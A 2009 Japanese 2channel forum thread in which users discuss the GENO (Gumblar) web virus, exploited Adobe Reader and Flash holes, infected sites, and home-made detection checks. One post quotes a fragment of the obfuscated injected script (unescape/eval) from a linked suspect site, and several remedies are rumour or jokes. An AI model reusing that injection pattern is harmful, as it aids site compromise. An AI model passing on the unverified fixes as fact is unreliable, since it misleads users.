ようつべ見て感染することはあるんでしょうか?
709名無しさん@九周年:2009/05/18(月) 21:40:29 ID:SkqoCQVV0
トップページの左上、 Flash playerのバナーをクリックすれば勝手に最新
がダウンロード。
710名無しさん@九周年:2009/05/18(月) 21:43:20 ID:SkqoCQVV0
右上だった
711名無しさん@九周年:2009/05/18(月) 21:47:17 ID:GGlFTNaP0
去年のPWN to OWNの結果を知るべきw
712名無しさん@九周年:2009/05/18(月) 21:47:37 ID:gM3s5Ulj0
え、もしかしてブラウザごとにフラッシュバージョン上げないと駄目なの?
いつもオペラだからオペラしかバージョン上げてないんだけど…
IEもスレイプニルもfirefoxも入れてるんだけど。。
713名無しさん@九周年:2009/05/18(月) 21:49:14 ID:GYhmQZ7F0
>>712
フラッシュとアクロバットリーダの隙をついてるので
全部更新しないとだめ。
714名無しさん@九周年:2009/05/18(月) 21:50:45 ID:eHnHypqo0
一番簡単に感染を判定するには
LANケーブルを抜いて再起動すればいいんだな
715名無しさん@九周年:2009/05/18(月) 21:55:51 ID:iBPMR6230
foxit Reader使ってる俺は勝ち組?
716名無しさん@九周年:2009/05/18(月) 21:55:55 ID:OAeOOqii0
717名無しさん@九周年:2009/05/18(月) 21:56:31 ID:pC10Vnc/O
>>703
なるほどありがとん
まあたまに強力なウィルスがでてくるのはネットの醍醐味だが
面倒だからかかりたくはないな
718名無しさん@九周年:2009/05/18(月) 21:57:22 ID:gM3s5Ulj0
>>713
ありがとう、今から全部更新してくるorz
719名無しさん@九周年:2009/05/18(月) 22:02:32 ID:0E3aOJnQ0
>>707
感染のメカニズムはこっちの方が凶悪だけど、
感染後の挙動は、いちごの方が凶悪じゃない?
720名無しさん@九周年:2009/05/18(月) 22:09:32 ID:Mfh5EE/L0
フラッシュプレイヤーが最新で、
アドベリーダーってのが、9.1なら大丈夫ってことか?
721名無しさん@九周年:2009/05/18(月) 22:15:34 ID:MpLw/Wg70
>>695
台風の日に用もないのに海岸に行って波に飲まれるヤツだなwwww
722名無しさん@九周年:2009/05/18(月) 22:21:20 ID:DQLtSNLr0
>>720
283 名前: チドリソウ(dion軍)[sage] 投稿日:2009/05/18(月) 22:18:14.02 ID:fFtL8VLz
なあお前ら、念のために聞いておくが・・・

AdobeReaderを8以前から最新の9.1にアップデートして安心してないよな?
普通にAdobeからダウンしただけでは9.1.0がインスコされる。
しかしこれではGENOウィルスに無防備。

9.1を起動してアップデートすると9.1.1になる。
これがGENOウィルス対策版だ。
723名無しさん@九周年:2009/05/18(月) 22:27:39 ID:uBFI3xDn0
前にセキュリティー関連のポッドキャストでsandboxieってソフトを薦めてたよ。VMとはちと
違うんだが、sandboxという隔離された領域をつくって、その中だけでブラウザとかを
動作させるのでブラウザ経由で変なものがインストールされても、それはsandboxの外には影響を
与えんという触れ込みのソフト。うちはosが非対応だから使ったことがないが。
724名無しさん@九周年:2009/05/18(月) 22:34:16 ID:fAQ6Ecco0
>>706
> 普段Firefoxしか使ってないから確認したら、IEのフラッシュバージョンは9だったw

まさに俺もその状態で、IEのFlashアップデートしようとしたら
なんかセキュリティのためにActiveX使えなくなってて
アップデートできねえw
セキュリティレベル最低にしてもActiveX使えないってなんなんだw
725名無しさん@九周年:2009/05/18(月) 22:49:21 ID:Mfh5EE/L0
>>722
なるほど
9.1.1/8.1.5/7.1.2のどれかなら(一応)対策されてるってことか?
726名無しさん@九周年:2009/05/18(月) 22:50:03 ID:DoBXcDCt0
天使の耳かきの情報を見るために、5月頭にサイトを見てたぜ
こわいこわい
727名無しさん@九周年:2009/05/18(月) 23:15:58 ID:T2uo51O60
Web業界の人間は洒落にならんワームだよなあ
もっと騒ぎになって良いはずなのに、なんでこんな水面下進行なんだろ
728名無しさん@九周年:2009/05/18(月) 23:16:55 ID:Mfh5EE/L0
フラシュプレイヤーの方は10,0,22,87でいいのかな?ω?
729名無しさん@九周年:2009/05/18(月) 23:37:03 ID:CDquL2d+0
フォトショップアンインストールしてて暫くみれなくてもいいやーと思っていたpsdファイルが
フラッシュプレイヤー入れて見れたのにびびってプレイヤーもアンしたところだった
勝手に関連づけるのね
Vistaだから?
まあ今回は助かったようだけど
730名無しさん@九周年:2009/05/18(月) 23:38:50 ID:9vZ/4QlT0
>>728

たぶんOK
731名無しさん@九周年:2009/05/18(月) 23:48:24 ID:Mfh5EE/L0
d
まぁ、一応最新版にしたけど
俺の使ってるAVG君が対応するまでネット巡回は避けるわ〜
732名無しさん@九周年:2009/05/18(月) 23:51:46 ID:3JAObACB0
ちょっとサイトの様子を見てくる
733名無しさん@九周年:2009/05/18(月) 23:52:49 ID:UumZnpy10
家政婦は見た。そのサイトを。
734名無しさん@九周年:2009/05/19(火) 00:08:35 ID:7SqC4eHS0
>>732
無茶しやがって・・・・
735名無しさん@九周年:2009/05/19(火) 00:10:01 ID:ErIhmNS90
>>727
業界人の中でも、ちゃんとした知識を持っているヤツはともかく
その周辺で玄人気取りなヤツが問題なわけで。

横から見た対処法を、勘違いで覚えて実行されて大惨事とか、冗談じゃねぇや。

だから慌てず騒がす、静かにやらざるを得ない。
736名無しさん@九周年:2009/05/19(火) 00:10:44 ID:7SqC4eHS0
これって、Spybotとかspyware Brasterとかではじけないのかな?
737名無しさん@九周年:2009/05/19(火) 01:11:24 ID:rPxdORxR0
>>732
必ず帰ってこいよ……!
738名無しさん@九周年:2009/05/19(火) 01:17:47 ID:pKjTaDx20
>>732
二階級特進
739名無しさん@九周年:2009/05/19(火) 01:34:56 ID:u51XYROLO
某サイトの様子を携帯からそっと覗いたら、
そのサイトのブックマークのリンクが
大量に消してあった。

こえぇぇ。。
740名無しさん@九周年:2009/05/19(火) 02:14:04 ID:r3qdkvqn0
avast先生がこれだけ心強く思えたことはない
741名無しさん@九周年:2009/05/19(火) 02:19:18 ID:xh4vBIBm0
化石のMe使ってる俺はどうすれば・・・
とりあえず、レジストリエディタは立ち上がった。
cmd.exeは無いので
MS-DOSプロンプトで「dir C:\WINDOWS\system32\sqlsodbc.chm」を探したら無かった。

AcrobatReaderはアンインスコ
火狐のJavaスクリプトは切って、先読みも外した
Flashは残念ながら9までしか入らん

あーヤダ、めんどくせぇ
742名無しさん@九周年:2009/05/19(火) 02:35:11 ID:NfRPepc90
そもそも無ければ心配しなくても良かったのでは
743名無しさん@九周年:2009/05/19(火) 03:22:00 ID:czqa3tZy0
>>635
あつものとか、なますとか、難しい漢字使うな。
つか、なますはともかく、あつものって何?
やっぱ熱いもの?
羊羹ってジンギスカン?
744名無しさん@九周年:2009/05/19(火) 05:15:11 ID:Eur/1DCR0
羹(あつもの)は要するに肉やら野菜やらの入った熱い汁物のこと。
羊羹とはその名の通り羊のあつもので、冷えるとゼラチン質のせいで固まった。
肉の食えない坊さんが、小麦粉やら葛粉と小豆でそれを模して作ったのが今の日本の羊羹。
745名無しさん@九周年:2009/05/19(火) 07:32:27 ID:qz+M7Y1N0
今朝からavastがクルクルしなくなったのだが・・・
746名無しさん@九周年:2009/05/19(火) 08:45:31 ID:r/r0TIYY0
adobe自体入れてないんだけど大丈夫?
747名無しさん@九周年:2009/05/19(火) 09:55:13 ID:CjvDKKHg0
>>745
変わりにお前の頭がクルクル回ってるから安心しろ
748名無しさん@九周年:2009/05/19(火) 10:00:14 ID:QSl4k9bt0
>>745
更新するとクルクルする
749名無しさん@九周年:2009/05/19(火) 10:09:25 ID:V+8FTUkO0
http://www.alexa.com/search?q=gumblar.cn

alexaの人気サイトに絶賛ランクイン中w 現在588,338位
martuz.cnはランク外だな
750名無しさん@九周年:2009/05/19(火) 10:27:07 ID:kq0G1PYC0
いつまで続くんだこれ?
束縛された
いんたーねっつは不便でしょーがねぇ
751名無しさん@九周年:2009/05/19(火) 10:41:59 ID:t6LblqML0
なんでニュー速+ではこんな盛り上がってないの?
皆気づいてスルーしてるんならいいけど、
全然気づいてない人も結構居るんだろうなぁ…怖いよ。
752名無しさん@九周年:2009/05/19(火) 10:44:00 ID:kq0G1PYC0
スレタイがよろしくないのかねぇ
753名無しさん@九周年:2009/05/19(火) 11:06:17 ID:0mo4AWTP0
こわいなあ
754名無しさん@九周年:2009/05/19(火) 11:33:21 ID:qCwb2X+M0
>>751
企業側からすれば感染して攻撃側になった事実を認めると
イメージダウンどころか訴訟になりかねんからな
テレビのほうにも圧力かけてるんだろう
755名無しさん@九周年:2009/05/19(火) 11:45:53 ID:J792W4CJ0
>>55
これすごいな
ターミネーターでスカイネットが戦争始めたときみたいだ
756名無しさん@九周年:2009/05/19(火) 11:49:13 ID:PXMvSSdg0

大変なニュースなのに、テレビ、新聞大手メディアは完全スルーだな。

プリウス新発売のニュースなぞほっとけ
757名無しさん@九周年:2009/05/19(火) 11:50:28 ID:b0yOteyX0
>>755
感染したボットネットがいまどのくらいの数いるんだろう.
それらにどんな指示を出すんだろう.
パソコン通信黎明期から見てきた.
軍事ネットが学術ネットになり,商用可されてインターネットになるのも見てきた.
色んな混沌闇をみてきた.

次はネットそのものが闇に?
758名無しさん@九周年:2009/05/19(火) 12:04:32 ID:fEQIseiw0
>>757
数百万とも数千万とも。で、それを闇売買しているそうだよ。
759名無しさん@九周年:2009/05/19(火) 12:15:36 ID:bXb8ZMQfO
バスター仕事しろ
760名無しさん@九周年:2009/05/19(火) 12:20:04 ID:oiH+1hJ3O
ようやく関連スレっぽいの建ったなage
761名無しさん@九周年:2009/05/19(火) 12:25:01 ID:Kxxonpve0
わたし昨日小林製薬のサイト見たけど
昨日は大丈夫だよね
762名無しさん@九周年:2009/05/19(火) 12:38:40 ID:tLcubAL8O
>>751
同人スレでは盛り上がりのピーク越えたかな?w

まぁあそこは内容ループ地獄だがwww
763名無しさん@九周年:2009/05/19(火) 12:48:31 ID:Wp6rxrIC0
>>762
同人板の奴らは人間としてダメなのばかりだからな。
被害妄想爆発させてるだけで、感染拡大防止なんて全く頭にないみたい。

764名無しさん@九周年:2009/05/19(火) 12:48:59 ID:VaoxPDGZP
765 名前:192.168.0.774[sage] 投稿日:2009/05/19(火) 12:23:36 ID:kGobtrBpP
ちょい報告、ガイシュツだったらすまん。

全ての対策をおこなったPCでGENO感染したサイトを訪問
 ↓
avast!が遮断
 ↓
念のためavast!およびカスペ・バスターのオンラインでフルスキャン
 ↓
C:\WINDOWS\system32内に「system32.exe」が作成されているのを発見
 ↓
「system32.exe」の更新日時は2005年だが、作成日時はGENO感染サイト訪問時
 ↓
ヒューリスティック予測で「system32.exe」の疑わしい挙動を検出


とりあえず「system32.exe」は除去したが、まだ何かが潜んでいそうだ。
おまえらもC:\WINDOWS\system32を調べてみれ
ちなみに既知の「system32.exe」を作るワームとは別物。

766 名前:192.168.0.774[sage] 投稿日:2009/05/19(火) 12:32:23 ID:8FgxAqIl0
未感染PCではSystem32.exeは存在しないな
765名無しさん@九周年:2009/05/19(火) 13:07:27 ID:Wp6rxrIC0
GENOウィルス流行る
 ↓
セキュ板住人(兼同人板住人?)が初代スレ立てて広報してくれる
 ↓
意味が理解できず、板違いと叩く人などが出てくる
 ↓
理解して不安になった人が、なぜか質問スレではなくセキュリティ板のGENOスレ(分析や議論しているとこ)に押しかけて質問攻めする
 ↓
セキュリティ板のGENOスレでは同人板へ帰るよう誘導(その代わり同人板へ出張して質問に答える)
 ↓
同人板住人、なぜか質問に答える人を叩きだす(最初は自分も質問してたくせに...)
 ↓
同人板のスレからは今北さんを追い出し、他板に押し付けようとする人が演説を始める
 ↓
「質問禁止にしよう、質問は他板へ誘導してやれ!」と極めて自分勝手な理屈を述べだす
 ↓
「ハザードマップ作成や検体確保のために感染URLを公表して欲しい」との要請に対し、「凸が怖い」と保身を優先して拒否
 ↓
他板、同人板住人のあまりに自己中心的なDQN行為に驚愕する
 ↓
自己中を批判する人、腐女子嫌いで便乗叩きする者などが押し寄せる
 ↓
なぜか全てをセキュリティ板の仕業と勘違いした同人板住人が逆恨みでセキュリティ板を荒らす
 ↓
状況をみて面白がった厨房たちが、同人板・セキュリティ板ともに便乗荒らしをはじめる
 ↓
セキュリティ板は同情され、同人板は嘲笑と侮蔑の的となる
 ↓
VIPを中心に、801同人サイトを版権者へ通報&凸晒し祭りの準備が始まる ←New!
766名無しさん@九周年:2009/05/19(火) 13:15:28 ID:3+emV6NR0
>>741
俺98se
レジストリエディタなど両方とも立ち上がったし、一応大丈夫だとは思うが…
収集するまで専ブラで2ch見るだけになりそう
767名無しさん@九周年:2009/05/19(火) 13:24:06 ID:r/r0TIYY0
>>741,766
9x系はsystem32ディレクトリじゃなく、systemディレクトリを調べる
768名無しさん@九周年:2009/05/19(火) 13:54:04 ID:wIValM2B0
こうして見るとロクなスレ無いなあ
769名無しさん@九周年:2009/05/19(火) 14:22:48 ID:3+emV6NR0
systemディレクトリも問題なしでした

>>741
98はcommandでコマンドプロント起動できるけどMeはそうじゃないのかな?
770名無しさん@九周年:2009/05/19(火) 15:03:28 ID:7SqC4eHS0
>>769
Meでも、commandで立ち上がるよ。

ちなみに、アドビ フラッシュとか、バージョン8までしか対応してなかったと思うんだけど。
俺、バージョン9入れたら、Firefox起動時に「カーネル32が〜」と出て、8に戻したよん。
771名無しさん@九周年:2009/05/19(火) 17:05:19 ID:N/YuI7TU0
>>757
今はひたすらボットを増やしているだけのように見えるな。
ボットネットの親玉が、何を狙ってるのか気になる。。
772名無しさん@九周年:2009/05/19(火) 17:20:29 ID:lZkzGH5IO
どうバカホイホイw
773名無しさん@九周年:2009/05/19(火) 17:27:10 ID:hUxviRUW0
>>773
糸ようじスレと聞いて

・・・なんてふざけてる場合じゃないんだが、
どうバカは反応せざるを得ない。
774名無しさん@九周年:2009/05/19(火) 19:10:08 ID:/tQbN+gE0
>>764
system32.exeが作成されるってのはマジ?
775名無しさん@九周年:2009/05/19(火) 19:19:50 ID:VaoxPDGZP
>>774
マジ。
被害者がポツポツ出てきている。
日本で使われてる多くのセキュリティソフトは対応していない。

これの亜種な。
http://www.virustotal.com/jp/analisis/138404683259a191c78642e22bdaf4ab
776名無しさん@九周年:2009/05/19(火) 19:24:06 ID:Wp6rxrIC0
system32.exeがsystem32フォルダ以外にも作られた報告が出てるな。
あと検索してもファイルは出てこないが、プロセスではsystem32.exeがしっかり活動しているという。
system32.exeを展開した本体は別の場所に潜伏してるだろうし・・・

GENOウィルスの作者は何重にも手の込んだことをしてるので、かなりやっかいだ。
777名無しさん@九周年:2009/05/19(火) 19:25:36 ID:bidX9zrU0
>>765
あ〜・・・、だから板全体が荒れてたんだ・・・
778名無しさん@九周年:2009/05/19(火) 19:30:19 ID:KpPrqIo50
>>776
まさに努力の賜物だよな。
779名無しさん@九周年:2009/05/19(火) 19:33:05 ID:rPxdORxR0
まだ終わってないんだよなぁ
怖すぎだろ
780名無しさん@九周年:2009/05/19(火) 19:37:31 ID:Wp6rxrIC0
>>778
LAN切断するとシステムをクラッシュするという、怨念たっぷりの努力だもんなあ・・・
781名無しさん@九周年:2009/05/19(火) 19:37:57 ID:ThyeGDmN0
終わりはないさ
セキュリティに穴がある限り盗み出す情報がカネになる限り無くなることはない
むしろもっとひどくなるだろうな
782名無しさん@九周年:2009/05/19(火) 19:44:21 ID:j6oZPyT40
製薬会社にコンピュータウィルスというギャグ・・・・? と思ってきてみた
783名無しさん@九周年:2009/05/19(火) 19:50:22 ID:KpPrqIo50
もはやギャグにならないレベル。
784名無しさん@九周年:2009/05/19(火) 19:54:10 ID:/tQbN+gE0
>>782
ギャグだと思ったら全然違って
あちこちのサイトが感染してるらしいので対策を講じても
ウイルス対策ソフトが全然対応してないのに愕然としてる。
785名無しさん@九周年:2009/05/19(火) 19:56:12 ID:rPxdORxR0
家族で共用してることもあって一応警戒はしたがありゃだめかもねぇ

なんでトレン○マイクロ使ってるのかわかんね
786名無しさん@九周年:2009/05/19(火) 19:57:05 ID:u51XYROLO
あげろ、あげるんだ、ジョー
787名無しさん@九周年:2009/05/19(火) 19:57:18 ID:LQTKKltXO
>>765
すげーな…
788名無しさん@九周年:2009/05/19(火) 20:00:23 ID:rNhSj7E40
GENOっすか
すごい勢いで広まってるね
789名無しさん@九周年:2009/05/19(火) 20:00:35 ID:Vfoh41CQ0
>>776
そもそも正規windowsにsystem32.exeなんてあるの?
790岸和田市民 ◆HOXERHLOXY :2009/05/19(火) 20:00:56 ID:sEMKX/Io0 BE:992023799-2BP(2251)
FTPクライアント搭載なのが斬新だな。
パスワード平文だし。(SFTPは知らんが)
そのうちメール自動ハックとか出るんだろうなぁ。
791名無しさん@九周年:2009/05/19(火) 20:06:18 ID:u51XYROLO
ズブの素人に出来ることは、このスレをあげることくらいっす。
あとは行き着けのスレでの広報。
792名無しさん@九周年:2009/05/19(火) 20:09:51 ID:kq0G1PYC0
ニュースでさっぱり取り上げないのが
逆にこえーな
793名無しさん@九周年:2009/05/19(火) 20:11:56 ID:qsDF6WnZ0
>>789
さっき検索してみたけど無かった
794名無しさん@九周年:2009/05/19(火) 20:12:14 ID:lmy88rEx0
>>1

ウィルスに犯される製薬会社ってシャレにならねぇなw
795名無しさん@九周年:2009/05/19(火) 20:12:20 ID:j6oZPyT40
>>696
そういうのは多分一時ファイル消したらでてこなくなる。
796名無しさん@九周年:2009/05/19(火) 20:12:33 ID:Y3lorimA0
そろそろカスペルスキーあたりがワクチン作らないかな
一応FlashとReaderは最新だけどなんか怖い
797名無しさん@九周年:2009/05/19(火) 20:16:27 ID:I01eoMXB0
>>794

自然発生の根拠を立証する責任もあるでしょ。

ウイルス発生の原因や元の話が一般には知られてないのがむしろおかしいでしょ。

対処療法してればいいってそんな無責任なことはない。
798名無しさん@九周年:2009/05/19(火) 20:19:55 ID:Vfoh41CQ0
>>793
一行目に突っ込んでみたがやっぱりないのか
タスクマネージャでもシステムフォルダでも見たこと無いから気になったわ
799名無しさん@九周年:2009/05/19(火) 20:22:10 ID:Uxo144FjO
えーと
今、うちのXP、変な音だして逝っちゃいました
800名無しさん@九周年:2009/05/19(火) 20:24:11 ID:kq0G1PYC0
>>799
暑かったからじゃね?
801名無しさん@九周年:2009/05/19(火) 20:38:55 ID:sHDsLwQJO
(´・ω・`)GENOウイルスに感染したせいで童貞になりました
おのれ憎きGENOウイルスめ!!
802名無しさん@九周年:2009/05/19(火) 20:39:14 ID:UWGmg6co0
感染する前は非童貞だったの?
803名無しさん@九周年:2009/05/19(火) 20:43:47 ID:Uxo144FjO
>>800
だよね?心当たりないもん
YOUTUBEみるくらいしか使ってないもん
804名無しさん@九周年:2009/05/19(火) 20:45:26 ID:kq0G1PYC0
ニコニコの祭り?で、GENOウイルスを誤検出させるウイルスコード(無害)が
そこらじゅうにコピペされまくってる模様
805名無しさん@九周年:2009/05/19(火) 20:47:16 ID:qsDF6WnZ0
>>804
何かよく分からないけどkwsk
806名無しさん@九周年:2009/05/19(火) 20:47:49 ID:Wp6rxrIC0
>>798
system32フォルダにsystem32.exeがあっても不自然じゃなくね?
・・・という意図のファイル名だと思う。
現時点ではsystem32.exeが存在した時点でウィルス感染が確定。
本体はたぶん別のところに潜伏してるので削除するだけじゃダメ。
807名無しさん@九周年:2009/05/19(火) 20:48:46 ID:k81Ui8QL0
糸ようじ大人気だな
808名無しさん@九周年:2009/05/19(火) 20:55:50 ID:kq0G1PYC0
>>805
【演奏してみた】中村イネについて語るスレ 2頭目【馬】
http://pc12.2ch.net/test/read.cgi/streaming/1242711324/

ここの252あたりから読むとkwskなれるかも
809名無しさん@九周年:2009/05/19(火) 21:06:46 ID:yqRfJMgkO
>>780
> LAN切断するとシステムをクラッシュする

うわ、まじか。
810名無しさん@九周年:2009/05/19(火) 21:09:52 ID:yqRfJMgkO
>>765
> GENOウィルス流行る
>  ↓
> セキュ板住人(兼同人板住人?)が初代スレ立てて広報してくれる
>  ↓
> 意味が理解できず、板違いと叩く人などが出てくる

まずこの時点で頭の悪さがパネェなw
811名無しさん@九周年:2009/05/19(火) 21:10:03 ID:te87xEi+0
>>780
よくわかんねーけどすげー
812名無しさん@九周年:2009/05/19(火) 21:14:11 ID:zPjV0Lkr0
>>811
ウイルス感染したら被害拡大させないためにもまずネット回線引っこ抜けって言うだろ?
それして再起動したらサヨウナラってことよ
813名無しさん@九周年:2009/05/19(火) 21:15:35 ID:Wp6rxrIC0
>>810
同人板のマジキチぶりは異常。
無知な同人板住人の代わりに質問に答えてた人を袋叩きにするわ、
被害妄想と排斥心の塊になって↓みたいな意味不明なテンプレ作るしw

>※書き込む際は、名前欄にはGENO#GENOと入力してください。

このスレね。
【質問禁止】同人サイト向け・GENOウィルス注意9【報告専用】
http://changi.2ch.net/test/read.cgi/doujin/1242651321/
814名無しさん@九周年:2009/05/19(火) 21:25:25 ID:9J71InRF0
GENOウィルス
win Xpの場合
sqlsodbc.chmのバイト数 50727ならokであろうと言われている。

win 2kの場合sqlsodbc.chmは存在しない。
有った場合削除。

ファイル名を指定して実行⇒cmd で変なら疑うべき。

815名無しさん@九周年:2009/05/19(火) 21:30:39 ID:byXqn8DP0
>>690
GENOウイルスチェッカー
危険度0%
安全なURLです。踏んでも大丈夫でしょう。
評価ミス報告

戻る


もう大丈夫みたい
816名無しさん@九周年:2009/05/19(火) 21:35:18 ID:1MLUOU/80
このサイトもAvastが激怒するんだがやばいのか?
ttp://jwy.jp/mobile/?jb=freepage-view&freelink=16
817名無しさん@九周年:2009/05/19(火) 21:40:05 ID:lMwI0tMm0
>>816
`2fscr`69pt`3e`22)`3b`7d';var GvYX=unescape(ayY.replace(/`/g,'%'));eval(GvYX)})();

まっくろくろすけっぽいね
818名無しさん@九周年:2009/05/19(火) 21:41:18 ID:0keIw3QZ0
>>727
> Web業界の人間は洒落にならんワームだよなあ
> もっと騒ぎになって良いはずなのに、なんでこんな水面下進行なんだろ

Web屋は「カコイイ俺様」が最優先価値だからじゃないか?
819名無しさん@九周年:2009/05/19(火) 21:43:14 ID:3iXOdWMn0
感染したらクノーピクスでデータ救出はできるのでしょうか
820名無しさん@九周年:2009/05/19(火) 21:43:22 ID:Wp6rxrIC0
>>814
それは既に古い。
新しい異種はそれでは判別不可能。
821名無しさん@九周年:2009/05/19(火) 21:44:20 ID:VaoxPDGZP
>>819
出来る。
822名無しさん@九周年:2009/05/19(火) 21:44:24 ID:9J71InRF0
>>816
なんだ 単なる無修正画像か。
823名無しさん@九周年:2009/05/19(火) 21:47:34 ID:dGpRGw4v0
ノートン先生が5/18付のウイルス定義で対応したみたいだよ。
824名無しさん@九周年:2009/05/19(火) 21:47:42 ID:3iXOdWMn0
>>821
ありがとう。安心しました。
825名無しさん@九周年:2009/05/19(火) 21:48:24 ID:Gdj92R8l0
そういやこの前同僚のPCが妙な動きしてたな・・・
フリーズしたので電源切って強制終了>再起動>しばらく操作受け付けず無反応
しばらくすると何事も無かったように動き出した

何か関係あるのだろうか・・・
826名無しさん@九周年:2009/05/19(火) 21:50:32 ID:byXqn8DP0
>>816
GENOウイルスチェッカー
危険度1000%
超絶危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
評価ミス報告

戻る
827名無しさん@九周年:2009/05/19(火) 21:54:39 ID:5keBf0c60
踏んだだけでPCぶっ壊れるとか半端じゃないな
828名無しさん@九周年:2009/05/19(火) 21:55:23 ID:FdaTL5AxO
現実世界でもインフルで大変なのに電脳世界でもインフル並のモノが来るとはな
829名無しさん@九周年:2009/05/19(火) 21:58:51 ID:yFri5YmSO
もうわけわかんなくて怖いから
ネットは携帯とmeたんだけで繋ぐようにするわ

てかニュ速+はどのウイルススレもスレタイが緊急性を感じないわ
830名無しさん@九周年:2009/05/19(火) 22:00:11 ID:0keIw3QZ0
> 1.「同サイト」を管理していた「社内PC」1台にコンピュータウイルスが感染

要するに、コンピュータ知識もなくウェブサイトの取り扱いをやってた
マカーのWeb屋が死亡するってことかwww
ざまあwwww
831名無しさん@九周年:2009/05/19(火) 22:00:59 ID:47rZPEMb0
意味不明
832名無しさん@九周年:2009/05/19(火) 22:01:58 ID:NfRPepc90
なんでマカー
833名無しさん@九周年:2009/05/19(火) 22:02:12 ID:9anMaf4q0
そろそろ世界規模でセキュリティ会社と政府機関で手を組んで対ウイルス連合作らんと
まずいんじゃね?
バスターやノートンとか複数のソフト入れると同士討ちと殺し合いやってOSまで動かない
とかじゃもう論外ぽ
834名無しさん@九周年:2009/05/19(火) 22:03:30 ID:p0mFwVx70
こえ〜。
今更知ったぞこれ。
とりあえず自分のPCとサイトは無事っぽい。

あとは会社のPCか・・・
835名無しさん@九周年:2009/05/19(火) 22:07:21 ID:5B1Iaf6A0
何でこのスレこんな静かなの
836名無しさん@九周年:2009/05/19(火) 22:09:04 ID:LdoZsDTyO
ジェノサイ・
837名無しさん@九周年:2009/05/19(火) 22:12:20 ID:+RmrjiMs0
Javaスクリプトを常に切ってれば、大丈夫?
838名無しさん@九周年:2009/05/19(火) 22:15:25 ID:jIOdqemD0
よくわからないけどadobeをアンインストールすればいいの?
839名無しさん@九周年:2009/05/19(火) 22:16:16 ID:VR9BMCx1i
>>161
マカーは大丈夫なん?
840名無しさん@九周年:2009/05/19(火) 22:16:20 ID:bidX9zrU0
>>835
スレタイかなあ・・・
841名無しさん@九周年:2009/05/19(火) 22:17:28 ID:p0mFwVx70
これの恐いところは安全だったサイトが次の日には感染してるかもしれんってとこだな。
842名無しさん@九周年:2009/05/19(火) 22:17:35 ID:kq0G1PYC0
ノートン先生使えねぇ、と切ったばかりなのに
ここにきて本気出すなんて
843名無しさん@九周年:2009/05/19(火) 22:19:30 ID:5B1Iaf6A0
>>840
だよねー・・・スレタイに「GENO」でも入れてくれてたら違ったかもしれん
844名無しさん@九周年:2009/05/19(火) 22:19:48 ID:5keBf0c60
そりゃ先生は金とってんだかから、Avastに遅れとったままとか許されないだろ
845名無しさん@九周年:2009/05/19(火) 22:22:35 ID:mjb5HQkD0
新型インフルエンザの事とやと思うやろ パソコンからもかかると思たやんけ
846名無しさん@九周年:2009/05/19(火) 22:26:38 ID:wvvp+/o10
>>39
表示されない&java有効を求めてくるサイトは「あ、そう」てな感じで閉じちまう。
847名無しさん@九周年:2009/05/19(火) 22:26:49 ID:kq0G1PYC0
腐が湧いてこないのはいいんだけどな
848名無しさん@九周年:2009/05/19(火) 22:28:24 ID:UQ6xFuFT0
あれ? 俺この前コマンドプロンプトが立ち上げられなくなって、
2ちゃんもかちゅ〜しゃだとスレを見れなくなって、
Ad-Aware も更新出来なくなったり
他にも不具合でまくりだったんだけど、
これにやられた???
システムの復旧でなおったてるんだが・・
849名無しさん@九周年:2009/05/19(火) 22:33:43 ID:bidX9zrU0
>>845
マスクすれば大丈夫w
850名無しさん@九周年:2009/05/19(火) 22:38:01 ID:3F1qxfFO0
>>848
試しにLAN引っこ抜いて再起動してみればいいんじゃね?
それで無事だったらセーフ
ぶっこわれたら駆除する手間が省けたってことでやはりセーフ
851名無しさん@九周年:2009/05/19(火) 22:45:34 ID:Y3lorimA0
バックアップ完了 まあたいした物は入ってないけど

リカバリディスクどこやったかな…?
カスペルさんが対応してくれる日までリアルでもバーチャルでもウィルスに怯える日々が続きそう
852名無しさん@九周年:2009/05/19(火) 22:49:43 ID:u51XYROLO
大事件あげ。


日経ITProのホムペで
このPCウィルスのニュースを見つけたけど、
5月15日付けのニュースなんだよなぁ…。
4日ルールでスレ立たんよ。。orz
853名無しさん@九周年:2009/05/19(火) 22:52:43 ID:UQ6xFuFT0
>>850
駄目だ。やられてたっぽい。
sqlsodbc.chmのファイルサイズも4,096 バイトとか変らしい?し、
adawareもファイル更新できない。
初めてウイルスにやられた。。
アクロバットがいかれてるなぁ、って思ってたんだよな。。
クリーンインストールって、データ全部飛ばしてインストールするしかないのかな・・?
854名無しさん@九周年:2009/05/19(火) 22:54:47 ID:Y3lorimA0
クリーンインストールってのは「PCを買ったときの状態に戻す」ってやつだしね…
バックアップとってる?取ってなかったら諦めるしかないかも

しかしなんで好き好んでウィルスなんか作るんだろうな
855名無しさん@九周年:2009/05/19(火) 22:55:28 ID:/tQbN+gE0
>>852
日経BPなら今日付けのがあるけど、誰もスレ立てしないだろ?

Adobe ReaderやFlash Playerの脆弱性を突く「Webウイルス」に注意
セキュリティ組織が警告、Webページにアクセスするだけで被害の恐れ
2009年5月19日

http://www.nikkeibp.co.jp/article/news/20090519/153772/
856名無しさん@九周年:2009/05/19(火) 22:58:03 ID:6HSf5sD80
本日、小林製薬のHPに対するマスメディアの警告記事を
見なかったんですが、これは小林製薬からの圧力なんでしょうか?

もし相ならマスメディアの存在意義っていったい・・・・・
857名無しさん@九周年:2009/05/19(火) 22:59:05 ID:bidX9zrU0
>>856
GENOってネーミングがヤバくて放送できないのかもw
858名無しさん@九周年:2009/05/19(火) 23:01:43 ID:klBEWhhi0
これ、あんまり話題になってないね。
インフルエンザより気になるよ。
859名無しさん@九周年:2009/05/19(火) 23:02:39 ID:bidX9zrU0
>>855
+で探したら、それっぽいのが・・・
【社会】PDFとFlash Playerの脆弱性を利用し、Web経由で感染するマルウェアが猛威をふるう
http://tsushima.2ch.net/test/read.cgi/newsplus/1242695024/
860名無しさん@九周年:2009/05/19(火) 23:06:54 ID:IjHvMbun0
>>856
ある程度の規模の企業なら、サイト管理にはだいたい広告代理店が噛んでる
マスコミは広告がないと食っていけない

あとはだいたいわかるよな?
861名無しさん@九周年:2009/05/19(火) 23:10:02 ID:6HSf5sD80
>>860
マスコミの存在価値がないことは、分かりましたw
862岸和田市民 ◆HOXERHLOXY :2009/05/19(火) 23:10:53 ID:sEMKX/Io0 BE:171460872-2BP(2251)
なんて発音するのだろう。
863名無しさん@九周年:2009/05/19(火) 23:12:56 ID:/9Goxa180
http://urasoku.blog106.fc2.com/blog-entry-694.html
スレとはあんま関係ないけどさ、これはどういう事?
864現役の人:2009/05/19(火) 23:13:46 ID:+nVqVyAG0
この問題、本当にかなりヤバイのにあまり取り上げられないな。

